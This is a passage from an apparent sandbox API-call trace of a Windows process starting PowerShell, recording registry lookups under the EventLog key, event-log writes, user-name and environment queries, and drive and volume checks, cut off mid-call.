lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.817] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.817] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.817] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.817] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0xd2630, lpcchName=0x24e710, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24e710, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.817] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x354) returned 0x0 [0029.817] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.818] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x378) returned 0x0 [0029.818] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.818] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x37c) returned 0x0 [0029.818] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.818] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x380) returned 0x0 [0029.818] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.818] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x384) returned 0x0 [0029.818] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.818] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x388) returned 0x0 [0029.819] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.819] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x5 [0029.821] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x38c) returned 0x0 [0029.821] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x0) returned 0x2 [0029.821] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x390) returned 0x0 [0029.821] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6bc | out: phkResult=0x24e6bc*=0x394) returned 0x0 [0029.821] RegCloseKey (hKey=0x394) returned 0x0 [0029.821] RegCloseKey (hKey=0x374) returned 0x0 [0029.821] RegCloseKey (hKey=0x390) returned 0x0 [0029.822] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e680 | out: phkResult=0x24e680*=0x390) returned 0x0 [0029.822] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24e6e8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e6e4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24e6e8*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24e6e4*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.822] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0xd2630, lpcchName=0x24e704, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24e704, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.822] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0xd2630, lpcchName=0x24e704, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24e704, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.822] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0xd2630, lpcchName=0x24e704, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24e704, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.822] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0xd2630, lpcchName=0x24e704, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24e704, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.822] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0xd2630, lpcchName=0x24e704, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24e704, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.822] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0xd2630, lpcchName=0x24e704, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24e704, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.822] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0xd2630, lpcchName=0x24e704, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24e704, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.823] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0xd2630, lpcchName=0x24e704, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24e704, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.823] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0xd2630, lpcchName=0x24e704, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24e704, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0029.823] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x374) returned 0x0 [0029.823] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x0) returned 0x2 [0029.823] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x394) returned 0x0 [0029.823] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x0) returned 0x2 [0029.823] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x398) returned 0x0 [0029.823] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x0) returned 0x2 [0029.824] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x39c) returned 0x0 [0029.824] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x0) returned 0x2 [0029.824] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x3a0) returned 0x0 [0029.824] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x0) returned 0x2 [0029.824] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x3a4) returned 0x0 [0029.824] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x0) returned 0x2 [0029.824] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x0) returned 0x5 [0029.825] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x3a8) returned 0x0 [0029.825] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x0) returned 0x2 [0029.825] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x3ac) returned 0x0 [0029.825] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6b0 | out: phkResult=0x24e6b0*=0x3b0) returned 0x0 [0029.825] RegCloseKey (hKey=0x3b0) returned 0x0 [0029.826] RegCloseKey (hKey=0x390) returned 0x0 [0029.826] RegCloseKey (hKey=0x3ac) returned 0x0 [0029.828] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4390004 [0029.830] GetLastError () returned 0x0 [0029.830] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a2b508*="WSMan", lpRawData=0x2a2b3b0) returned 1 [0029.833] GetLastError () returned 0x0 [0029.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.834] GetLastError () returned 0xcb [0029.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.834] GetLastError () returned 0xcb [0029.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.834] GetLastError () returned 0xcb [0029.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.834] GetLastError () returned 0xcb [0029.834] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb5c60, nSize=0x24e824 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x24e824) returned 0x1 [0029.835] GetLastError () returned 0xcb [0029.835] GetUserNameW (in: lpBuffer=0xd2630, pcbBuffer=0x24e82c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x24e82c) returned 1 [0029.835] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a2f3b4*="Alias", lpRawData=0x2a2f270) returned 1 [0029.835] GetLastError () returned 0x0 [0029.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.836] GetLastError () returned 0xcb [0029.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.836] GetLastError () returned 0xcb [0029.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.836] GetLastError () returned 0xcb [0029.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.836] GetLastError () returned 0xcb [0029.836] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb5c60, nSize=0x24e824 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x24e824) returned 0x1 [0029.836] GetLastError () returned 0xcb [0029.836] GetUserNameW (in: lpBuffer=0xd2630, pcbBuffer=0x24e82c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x24e82c) returned 1 [0029.837] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a33318*="Environment", lpRawData=0x2a331d4) returned 1 [0029.837] GetLastError () returned 0x0 [0029.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.838] GetLastError () returned 0xcb [0029.838] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0029.839] GetLastError () returned 0xcb [0029.839] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="\\Users\\BGC6u8Oy yXGxkR") returned 0x16 [0029.839] GetLastError () returned 0xcb [0029.839] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x24e354, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0029.839] GetLastError () returned 0xcb [0029.839] SetErrorMode (uMode=0x1) returned 0x1 [0029.839] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x24e7d4 | out: lpFileInformation=0x24e7d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.839] GetLastError () returned 0xcb [0029.839] SetErrorMode (uMode=0x1) returned 0x1 [0029.841] GetLogicalDrives () returned 0x4 [0029.841] GetLastError () returned 0xcb [0029.842] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24e278, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.842] GetLastError () returned 0xcb [0029.843] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0029.843] GetLastError () returned 0xcb [0029.843] SetErrorMode (uMode=0x1) returned 0x1 [0029.844] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xd2730, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x24e7a0, lpMaximumComponentLength=0x24e79c, lpFileSystemFlags=0x24e798, lpFileSystemNameBuffer=0xd2630, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7a0*=0x78b95e2e, lpMaximumComponentLength=0x24e79c*=0xff, lpFileSystemFlags=0x24e798*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0029.844] GetLastError () returned 0xcb [0029.844] SetErrorMode (uMode=0x1) returned 0x1 [0029.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0029.844] GetLastError () returned 0xcb [0029.844] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24e300, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.844] GetLastError () returned 0xcb [0029.844] SetErrorMode (uMode=0x1) returned 0x1 [0029.844] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2a34538 | out: lpFileInformation=0x2a34538*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.845] GetLastError () returned 0xcb [0029.845] SetErrorMode (uMode=0x1) returned 0x1 [0029.845] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24e300, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.845] GetLastError () returned 0xcb [0029.845] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24e28c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.845] GetLastError () returned 0xcb [0029.845] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0029.845] GetLastError () returned 0xcb [0029.846] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24e248, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.846] GetLastError () returned 0xcb [0029.846] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0029.846] GetLastError () returned 0xcb [0029.846] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24e250, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.846] GetLastError () returned 0xcb [0029.846] SetErrorMode (uMode=0x1) returned 0x1 [0029.846] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2a35190 | out: lpFileInformation=0x2a35190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.847] GetLastError () returned 0xcb [0029.847] SetErrorMode (uMode=0x1) returned 0x1 [0029.847] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24e258, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.847] GetLastError () returned 0xcb [0029.847] SetErrorMode (uMode=0x1) returned 0x1 [0029.847] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2a352e0 | out: lpFileInformation=0x2a352e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.847] GetLastError () returned 0xcb [0029.847] SetErrorMode (uMode=0x1) returned 0x1 [0029.847] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24e29c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.847] GetLastError () returned 0xcb [0029.847] SetErrorMode (uMode=0x1) returned 0x1 [0029.847] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2a35480 | out: lpFileInformation=0x2a35480*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.847] GetLastError () returned 0xcb [0029.847] SetErrorMode (uMode=0x1) returned 0x1 [0029.847] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb5c60, nSize=0x24e824 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x24e824) returned 0x1 [0029.847] GetLastError () returned 0xcb [0029.847] GetUserNameW (in: lpBuffer=0xd2630, pcbBuffer=0x24e82c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x24e82c) returned 1 [0029.848] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a381d8*="FileSystem", lpRawData=0x2a38094) returned 1 [0029.848] GetLastError () returned 0x0 [0029.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.849] GetLastError () returned 0xcb [0029.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.849] GetLastError () returned 0xcb [0029.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.849] GetLastError () returned 0xcb [0029.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.849] GetLastError () returned 0xcb [0029.850] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb5c60, nSize=0x24e824 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x24e824) returned 0x1 [0029.850] GetLastError () returned 0xcb [0029.850] GetUserNameW (in: lpBuffer=0xd2630, pcbBuffer=0x24e82c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x24e82c) returned 1 [0029.850] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a3c298*="Function", lpRawData=0x2a3c154) returned 1 [0029.850] GetLastError () returned 0x0 [0029.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.852] GetLastError () returned 0xcb [0029.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e238, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.855] GetLastError () returned 0xcb [0029.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.855] GetLastError () returned 0xcb [0029.855] GetFullPathNameW (in: 